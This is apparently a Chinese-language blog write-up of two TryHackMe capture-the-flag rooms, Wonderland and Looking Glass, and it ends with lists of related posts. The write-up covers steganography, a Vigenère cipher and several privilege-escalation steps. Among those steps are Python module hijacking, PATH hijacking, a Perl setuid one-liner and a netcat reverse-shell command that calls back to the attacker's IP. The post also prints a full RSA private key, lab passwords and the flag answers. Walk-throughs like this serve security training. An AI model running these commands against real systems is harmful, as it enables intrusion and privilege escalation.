Tryhackme-Wonderland

最新推荐文章于 2024-06-01 09:33:37 发布
最新推荐文章于 2024-06-01 09:33:37 发布
阅读量416 收藏
点赞数
分类专栏: # Tryhackme-Series 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36531487/article/details/120287318
版权

Wonderland

文章目录

Wonderland

Task1 Capture the flags

nmap扫描发现开启22端口和80端口

image-20210910162455913

80端口进行目录扫描,未发现突破口

image-20210910162757530

下载/img/white_rabbit_1.jpg,使用steghide提取隐藏文件,得到提示follow the r a b b i t,尝试访问链接http://IP/r/a/b/b/i/t/,找到隐藏页面

在隐藏页面源代码中找到ssh账密成功登录服务器。

image-20210910170039026

1.Obtain the flag in user.txt

查看家目录文件,发现root.txt,但无权访问;

image-20210910170939456

root.txt被放置在普通用户家目录下不常见,尝试移动到/root目录下,成功但无法查看目录下文件,尝试直接读取user.txt,得到flag为thm{“Curiouser and curiouser!”}

image-20210910171355725

2.Escalate your privileges, what is the flag in root.txt?

执行sudo -l,发现可以以rabbit用户身份执行python脚本

image-20210910171432014

查看python脚本,脚本开头会导入random模块,我们在当前目录下创建一个random.py文件,文件内容就是生成shell

import os

os.system("/bin/bash")

以用户rabbit身份执行python脚本就会导入我们所新建的random.py文件执行,成功获取脚本所有人用户rabbit权限的shell。

rabbit用户家目录下发现teaParty二进制文件并拥有S权限,rabbit可以执行该文件

image-20210913140111144

image-20210913155009406

分析该文件,发现文件会调用date,但未使用绝对路径,考虑将tmp目录加入环境变量,在tmp目录下新建date文件提权。

11

在hatter用户家目录下发现password.txt,得到账密hatter:WhyIsARavenLikeAWritingDesk?

上传linpeans.sh,给予运行权限,执行发现,root用户在hatter组中;

image-20210913161156860

image-20210913162547166

Perl

Capabilities

If the binary has the Linux capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.CAP_SETUID

  • cp $(which perl) .
sudo setcap cap_setuid+ep perl

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

执行perl命令进行提权,得到root flag为thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

image-20210913163323262

Looking Glass

Task1 Looking Glass

nmap扫描发现开启大量的端口,每个端口都在运行Dropbear SSH服务器

PORT STATE SERVICE VERSION

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3f:15:19:70:35:fd:dd:0d:07:a0:50:a3:7d:fa:10:a0 (RSA)
|   256 a8:67:5c:52:77:02:41:d7:90:e7:ed:32:d2:01:d9:65 (ECDSA)
|_  256 26:92:59:2d:5e:25:90:89:09:f5:e5:e0:33:81:77:6a (ED25519)
9000/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9001/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9002/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9003/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9009/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9010/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9011/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9040/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9050/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9071/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9080/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9081/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9090/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9091/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9099/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9100/tcp  open  jetdirect?
9101/tcp  open  jetdirect?
9102/tcp  open  jetdirect?
9103/tcp  open  jetdirect?
9110/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9111/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9200/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9207/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9220/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9290/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9415/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9418/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9485/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9500/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9502/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9503/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9535/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9575/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9593/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9594/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9595/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9618/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9666/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9876/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9877/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9878/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9898/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9900/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9917/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9929/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9943/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9944/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9968/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
9998/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
|_uptime-agent-info: SSH-2.0-dropbear\x0D
9999/tcp  open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10000/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10001/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10002/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10003/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10004/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10009/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10010/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10012/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10024/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10025/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10082/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10180/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10215/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10243/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10566/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10616/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10617/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10621/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10626/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10628/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10629/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
10778/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
11110/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
11111/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
11967/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
12000/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
12174/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
12265/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
12345/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
13456/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
13722/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
13782/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
13783/tcp open  ssh        Dropbear sshd (protocol 2.0)
| ssh-hostkey:
|_  2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)

尝试使用ssh以alice的身份连接不同的端口,会提示Lower或higner,根据提示镜子,响应Higher需要向下寻找正确的端口,响应Lower需要向上寻找正确的端口(这个端口是变化的),在我请求10701端口时,得到不一样的响应,提示需要输入secret.

The authenticity of host '[10.10.127.184]:10701 ([10.10.127.184]:10701)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.127.184]:10701' (RSA) to the list of known hosts. You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.

'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'

Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.

Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!

Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.

'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.

'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Enter Secret:
Incorrect secret.
Connection to 10.10.127.184 closed.

信息开头提示Jabberwocky,这是Lewei.Carrol的诗,《爱丽丝梦游仙境》的作者。Jabberwocky by Lewis Carroll | Poetry Foundation密文正是加密后的诗,密文与原文并没有长度的变化只是字母替换,考虑 Vigenere 密码,解密密码需要密钥,已知原文和密文,提取一段密文与原文,将原文作为密钥解密密文得到重复的密钥 :Thealphabetcipher。

image-20210914101656565

使用密钥解密密文得到 Your secret is bewareTheJabberwock

image-20210914101826164

再次访问10701端口,输入secret得到账密jabberwock:InclinedPretendHeadsFarther,在22端口尝试登录

1.Get the user flag.

在用户家目录下找到user.txt,注意flag的格式为xxx{xxxxxxxxxxxxx},得到文本需要进行反转后才能得到flag为thm{65d3710e9d75d5f346d2bac669119a23}

image-20210914104053898

2.Get the root flag.

家目录下有特殊文件twasBrillig.sh,允许读写

image-20210914105700917

允许sudo -l,发现允许无密码重启,考虑开机自启项crontab

image-20210914105728661

查看crontab,开启会以tweedledum身份运行脚本

image-20210914105837029

修改脚本,添加反弹shell命令`` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1234 >/tmp/f`,运行sudo reboot得到shell。

image-20210914111943704

tweedledum家目录下发现两个特殊文件poem.txt和humptydumpty.txt

image-20210914112125373

解密humptydumpty.txt文件得到humptydumpty的密码 zyxwvutsrqponmlk

image-20210914112445484

切换账户至humptydumpty,查看家目录发现poetry.txt,查看文件,未发现有用信息

image-20210914112921738

运行sudo -l也未发有用信息,查看/home目录,发现alice目录权限异常,允许我们读取文件

image-20210914113152906

尝试读取alice用户的id_rsa,成功,以alice身份登录靶机

-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEAxmPncAXisNjbU2xizft4aYPqmfXm1735FPlGf4j9ExZhlmmD
NIRchPaFUqJXQZi5ryQH6YxZP5IIJXENK+a4WoRDyPoyGK/63rXTn/IWWKQka9tQ
2xrdnyxdwbtiKP1L4bq/4vU3OUcA+aYHxqhyq39arpeceHVit+jVPriHiCA73k7g
HCgpkwWczNa5MMGo+1Cg4ifzffv4uhPkxBLLl3f4rBf84RmuKEEy6bYZ+/WOEgHl
fks5ngFniW7x2R3vyq7xyDrwiXEjfW4yYe+kLiGZyyk1ia7HGhNKpIRufPdJdT+r
NGrjYFLjhzeWYBmHx7JkhkEUFIVx6ZV1y+gihQIDAQABAoIBAQDAhIA5kCyMqtQj
X2F+O9J8qjvFzf+GSl7lAIVuC5Ryqlxm5tsg4nUZvlRgfRMpn7hJAjD/bWfKLb7j
/pHmkU1C4WkaJdjpZhSPfGjxpK4UtKx3Uetjw+1eomIVNu6pkivJ0DyXVJiTZ5jF
ql2PZTVpwPtRw+RebKMwjqwo4k77Q30r8Kxr4UfX2hLHtHT8tsjqBUWrb/jlMHQO
zmU73tuPVQSESgeUP2jOlv7q5toEYieoA+7ULpGDwDn8PxQjCF/2QUa2jFalixsK
WfEcmTnIQDyOFWCbmgOvik4Lzk/rDGn9VjcYFxOpuj3XH2l8QDQ+GO+5BBg38+aJ
cUINwh4BAoGBAPdctuVRoAkFpyEofZxQFqPqw3LZyviKena/HyWLxXWHxG6ji7aW
DmtVXjjQOwcjOLuDkT4QQvCJVrGbdBVGOFLoWZzLpYGJchxmlR+RHCb40pZjBgr5
8bjJlQcp6pplBRCF/OsG5ugpCiJsS6uA6CWWXe6WC7r7V94r5wzzJpWBAoGBAM1R
aCg1/2UxIOqxtAfQ+WDxqQQuq3szvrhep22McIUe83dh+hUibaPqR1nYy1sAAhgy
wJohLchlq4E1LhUmTZZquBwviU73fNRbID5pfn4LKL6/yiF/GWd+Zv+t9n9DDWKi
WgT9aG7N+TP/yimYniR2ePu/xKIjWX/uSs3rSLcFAoGBAOxvcFpM5Pz6rD8jZrzs
SFexY9P5nOpn4ppyICFRMhIfDYD7TeXeFDY/yOnhDyrJXcbOARwjivhDLdxhzFkx
X1DPyif292GTsMC4xL0BhLkziIY6bGI9efC4rXvFcvrUqDyc9ZzoYflykL9KaCGr
+zlCOtJ8FQZKjDhOGnDkUPMBAoGBAMrVaXiQH8bwSfyRobE3GaZUFw0yreYAsKGj
oPPwkhhxA0UlXdITOQ1+HQ79xagY0fjl6rBZpska59u1ldj/BhdbRpdRvuxsQr3n
aGs//N64V4BaKG3/CjHcBhUA30vKCicvDI9xaQJOKardP/Ln+xM6lzrdsHwdQAXK
e8wCbMuhAoGBAOKy5OnaHwB8PcFcX68srFLX4W20NN6cFp12cU2QJy2MLGoFYBpa
dLnK/rW4O0JxgqIV69MjDsfRn1gZNhTTAyNnRMH1U7kUfPUB2ZXCmnCGLhAGEbY9
k6ywCnCtTz2/sNEgNcx9/iZW+yVEm/4s9eonVimF+u19HJFOPJsAYxx0
-----END RSA PRIVATE KEY-----

家目录下kitten.txt未发现有用信息,因为没有alice密码无法直接查看sudo -l,但可以访问/etc/sudoers.d/目录下文件

image-20210914113738363

查看/etc/sudoers.d/alice,允许用户以ssalg-gnikool的主机名无密码运行sudo

alice ssalg-gnikool = (root) NOPASSWD: /bin/bash

image-20210914115103142

image-20210914115219492

得到root flag为thm{bc2337b6f97d057b01da718ced6eadsf}

zhangwenbo1229
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tryhackme
03-08
tryhackme
TryHackMe-Wonderland
M1n9K1n9的博客
12-23 143
进入仙境并夺取旗帜循例,nmap扫一波只开了22和80先进web查看一下,gobuster也扫一波目录查看源代码有个/img文件夹,里面有三张图片gobuster扫到:[Size: 0][Size: 0][--> ./][Size: 0][--> r/]对着/r/再扫一波子目录扫出/r/a与/r页面一样的内容,继续这样扫直到/r/a/b/b/i/t/尝试登录ssh::~$成功登录这里的一切都是颠倒的:~"}我们可以修改python path。
探索网络安全的宝藏:TryHackMe CTF 收录库
最新发布
gitblog_00086的博客
06-01 449
探索网络安全的宝藏:TryHackMe CTF 收录库 项目地址:https://gitcode.com/edoardottt/tryhackme-ctf 在网络安全的世界中,不断学习和实践是保持敏锐的关键。TryHackMe 是一个极好的在线平台,它提供了各种安全训练靶机,帮助你在安全环境中提升自己的黑客防御和攻击技能。而今天我们要向您推荐的是由顶级用户 edoardottt 创建的一个特别资源...
tryhackme--Blog
qq_45414878的博客
11-15 366
tryhackme–Tony the Tiger
tryhackme--Wgel CTF
qq_45414878的博客
10-23 406
tryhackme--Wgel CTFnmapid_rsa信息泄漏wget的sudo提权 nmap 简单扫描靶机的服务 nmap -T4 -sS -sV 10.10.247.24 深度扫描也没没有什么可以直接利用的漏洞 目标机器为linux主机,并且目标主机开放了两个端口:22、80。 端口 服务 22 ssh 80 http id_rsa信息泄漏 访问80端口,发现为apache的默认页面,查看页面源代码,发现一句很有趣的话,其中 Jessie 可能为用户名 用dirsear
alice-in-wonderland
03-27
在互联网的世界里,每个网站都是一个独特的“仙境”,吸引着用户去探索、体验。... ...这些标记让浏览器知道如何渲染页面。...头部包含了元数据,如标题()、字符集(<meta charset="UTF-8">)等。...每个元素都有可能带有...
mapbox-studio-winter-wonderland.tm2
07-07
"Mapbox-studio-winter-wonderland.tm2-master"这个压缩包文件名暗示了这是一个Mapbox Studio项目的源代码仓库,包含了创建冬季仙境样式的全部文件和配置信息。如果你希望深入学习或复制这个样式,可以下载并研究...
2024华为OD机试D卷 - Wonderland - 免费看解析和代码.md
05-16
私信博主免费获取三天体验卡,可以观看所有OD真题、手撕代码、面试记录、考试报告
2024华为OD机试D卷 - Wonderland - 免费看解析和代码.html
05-13
私信博主免费获取真题解析以及代码
华为OD机试 - Wonderland(Java & JS & Python & C & C++).html
04-20
华为OD机试 - Wonderland(Java & JS & Python & C & C++).html付费专栏内容,免费下载,多种语言解法
TryHackMe - Archangel靶场
z4yn:)的博客
02-22 278
Archangel Boot2root, Web exploitation, Privilege escalation, LFI 0x01 信息收集 常规端口扫一波,发现只有22和80端口开放 先从80端口入手,常规的扫目录没有发现有价值的东西 在源代码里发现一个可以的域名 网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag 在用gobuster扫描网站目录,得到test.php和robots.txt robots....
TryHackMe - Tony the Tiger靶场
z4yn:)的博客
03-09 179
Tony the Tiger Learn how to use a Java Serialisation attack in this boot-to-root CVE-2015-7501 0x01 信息收集 先用Nmap扫描目标机端口,开放了不少端口。 任务1是到80端口拿一个flag 80端口搭建一个博客,常规扫目录没有发现有价值的东西。 查看页面源代码也没有发现线索,只剩下两篇博客的两张配图了 wget 把两张图片下载下来用steghide进行提取 ...
TryHackMe - Kenobi,全球最火的程序员学习路线
m0_60721860的博客
04-06 615
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 513
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe - Steel Mountain
Yin520的博客
03-23 765
